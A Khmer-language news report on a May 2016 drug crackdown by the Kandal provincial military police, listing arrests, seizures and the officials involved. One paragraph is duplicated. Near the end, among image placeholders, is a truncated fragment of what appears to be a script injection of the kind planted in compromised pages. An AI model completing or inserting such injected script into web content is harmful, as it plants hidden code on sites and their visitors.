ព្រឹតិ្តការណ៍ថ្មីៗ

អាវុធហត្ថខេត្តកណ្តាលបេីកប្រតិបត្តិការបង្ក្រាបករណីជួញដូរ ចែកចាយ និងប្រើប្រាស់គ្រឿងញៀនឃាត់ជនសង្ស័យ និងរឹបអូសថ្នាំបានមួយចំនួនធំ

1 ឆ្នាំ មុន 1 តូ សុផល

11872305_10153513108267508_7760316066293043812_o

ខេត្តកណ្តាល៖ ប្រតិបត្តិការបង្ក្រាបករណីជួញដូរ ចែកចាយ និងប្រើប្រាស់គ្រឿងញៀន របស់កម្លាំងអាវុធហត្ថខេត្តកណ្តាល ក្រោមការបញ្ជាផ្ទាល់ពីសំណាក់មេបញ្ជាការអាវុធហត្ថលោកឧត្តមសេនីយ៍ត្រី សំ តុលា បានធ្វើឡើងដូចភ្លៀងរលឹម និងឈានទៅដល់ការចាប់ខ្លួន ជនសង្ស័យជាបន្តបន្ទាប់ ព្រមទាំងដកហូតថ្នាំញៀនជាច្រើនផងដែរ។

ជាក់ស្តែងនៅរយ:ពេល២ថ្ងៃនេះ កម្លាំងអាវុធហត្ថខេត្តកណ្តាល បានបន្តបង្ក្រាបករណីជួញដូរគ្រឿងញៀន នៅតាមបណ្តាស្រុក និងបន្តមកកាន់ខណ្ឌទួលគោក រាជធានីភ្នំពេញ ដោយចាប់ខ្លួនជនសង្ស័យជាបន្តបន្ទាប់ ចំនួន៨នាក់ ថ្នាំញៀនប្រមាណ២០កញ្ចប់។

យោងតាមរបាយការណ៍ស្តីពីការបង្ក្រាបករណីរក្សាទុកជួញដូរ និងប្រើប្រាសដោយខុសច្បាប់នូវសារធាតុញៀន បានបង្ហាញថា នៅថ្ងៃទី២៣-២៤ ខែឧសភា ឆ្នាំ២០១៦ កម្លាំងអាវុធហត្ថខេត្តកណ្តាល បានបង្ក្រាបករណីគ្រឿងញៀនចំនួន៣លើក។

ទី១-សម្រាប់ ស្រុកស្អាង ការបង្ក្រាបបានធ្វើឡើងនៅវេលាម៉ោង២៖៣០នាទី ថ្ងៃទី២៣ ខែឧសភា ឆ្នាំ២០១៦ នៅចំណុចក្នុង ភូមិលេខ១ ឃុំស្វាយរលំដោយឃាត់ខ្លួនជនសង្ស័យនាក់៤ នាក់ ដោយដកហូតសារធាតុញៀន (ម៉ាទឹកកក) ចំនួន៥ កញ្ចប់ធំ និង១កញ្ចប់តូច ឧបករណ៍ប្រើប្រាស់ សម្ភារ:វេចខ្ចប់មួយចំនួន។

ដោយមានចម្លើយសារភាពពីជនសង្ស័យនៅវេលម៉ោង១:៤៥នាទី ថ្ងៃទី២៤ ខែឧសភា ឆ្នាំ២០១៦ កម្លាំងបានធ្វើការពន្លាតដែនដី សហការជាមួយកម្លាំងអាវុធហត្ថ រាជធានីភ្នំពេញ ក្រោមការសម្របសម្រួលពីលោកព្រះរាជអាជ្ញា អមសាលាដំបូងខេត្តកណ្តាល និងរាជធានីភ្នំពេញ កម្លាំងបានបង្ក្រាបករណីជួញដូរសារធាតុញៀន នៅចំណុចផ្លូវរថភ្លើង សង្កាត់បឹងកក់២ ខណ្ឌទួលគោក រាជធានីភ្នំពេញ។

សម្រាប់ប្រតិបត្តិការនេះកម្លាំងអាវុធហត្ថបាន ឃាត់ខ្លួនជនសង្ស័យម្នាក់ ភេទស្រី អាយុ២០ឆ្នាំ មុខរបរមិនពិតប្រាកដ រស់នៅក្នុងភូមិ២៣ សង្កាត់បឹងកក់២ ខណ្ឌទួលគោក ដោយដកហូត

សម្រាប់ប្រតិបត្តិការនេះកម្លាំងអាវុធហត្ថបាន ឃាត់ខ្លួនជនសង្ស័យម្នាក់ ភេទស្រី អាយុ២០ឆ្នាំ មុខរបរមិនពិតប្រាកដ រស់នៅក្នុងភូមិ២៣ សង្កាត់បឹងកក់២ ខណ្ឌទួលគោក ដោយដកហូតសារធាតុញៀនចំនួន២កញ្ចប់ធំ។

ទី២-សម្រាប់ ស្រុកខ្សាច់កណ្តាល ប្រតិបត្តិការនេះ បានធ្វើឡើង នៅវេលាម៉ោង៣៖៤០នាទី ថ្ងៃទី២៣ ខែឧសភា ឆ្នាំ២០១៦ នៅលើដងផ្លវចំណុច ភូមិវិហាសួគ៏ជើង ឃុំ វិហាសួគ៍ ស្រុកខ្សាច់កណ្តាល ដោយឃាត់ខ្លួនជនសង្ស័យ២នាក់ និងដកហូតថ្នាំញៀនចំនួន៥កញ្ចប់។

ទី៣-សម្រាបស្រុកកណ្តាលស្ទឹង ប្រតិបត្តិការនេះ បានធ្វើឡើង នៅវេលាម៉ោង៧៖៣០នាទី ថ្ងៃទី២៤ ខែឧសភា ឆ្នាំ២០១៦ នៅចំណុចភូមិកំពង់ទួល ឃុំអន្លង់រមៀត ដោយឃាត់ខ្លួនជនសង្ស័យម្នាក់ និងដកហូតថ្នាំញៀនចំនួន10កព្ចាប់ ជញ្ជីងសំរាប់ថ្លឹងគ្រឿងញៀនចំនួន១ កាំភ្លីេងកែច្នៃប្រីេខ្យល់ ០១ដើម ដែកឆាបចុងស្រួចចំនួន០១ដើម ដែកស្នរចុងស្រួច០១ដើម សម្ភារវេចខ្ចាប់ និងសំរាប់ប្រីេប្រាស់មួយចំនួន។

មន្រ្តីអាវុធហត្ថខេត្តកណ្តាល បានបញ្ជាក់ថា ប្រតិបត្តិការនេះ បានធ្វើឡើងក្រោមការដឹកនាំបញ្ជាពីលោកមេបញ្ជាការ សំ តុលា និងចុះដឹកនាំអនុវត្តផ្ទាល់ដោយលោកមេបញ្ជាការរង ទូច អីុណាន ដោយអនុវត្តតាមអនុសាសន៍របស់ នាយឧត្តមសេនីយ៍ សៅ សុខា និងលោល ម៉ៅ ភារុណ អភិបាលខេត្តកណ្តាល ព្រមទាំងមានការសហការនិងសម្របសម្រួលពីលោកព្រះរាជអាជ្ញា លឹម សុគន្ថា ជំនាញកងរាជអាវុធហត្ថផ្ទៃប្រទេស និងកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ និងខណ្ឌយ៉ាងល្អទាន់ពេលវេលា។

បើតាមមន្រ្តីអាវុធហត្ថ ក្រោយការសួរនាំទៅថ្នាំញៀន ភាគច្រើននាំយកពីភ្នំពេញហើយ ទៅចែកចាយនៅទឹកដីខេត្តកណ្តាល។

សម្រាប់ជនសង្ស័យទាំង៨នាក់ កំពុងសួរនាំ នៅទីបញ្ជាការដ្ឋានអាវុធហត្ថខេត្ត ដើម្បីកសាងសំណុំរឿងបញ្ជូនទៅតុលាការ ចាត់ការតាមនីតិវិធី៕

image image image image image image image image image image image

image image image image imagevar d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

%d bloggers like this: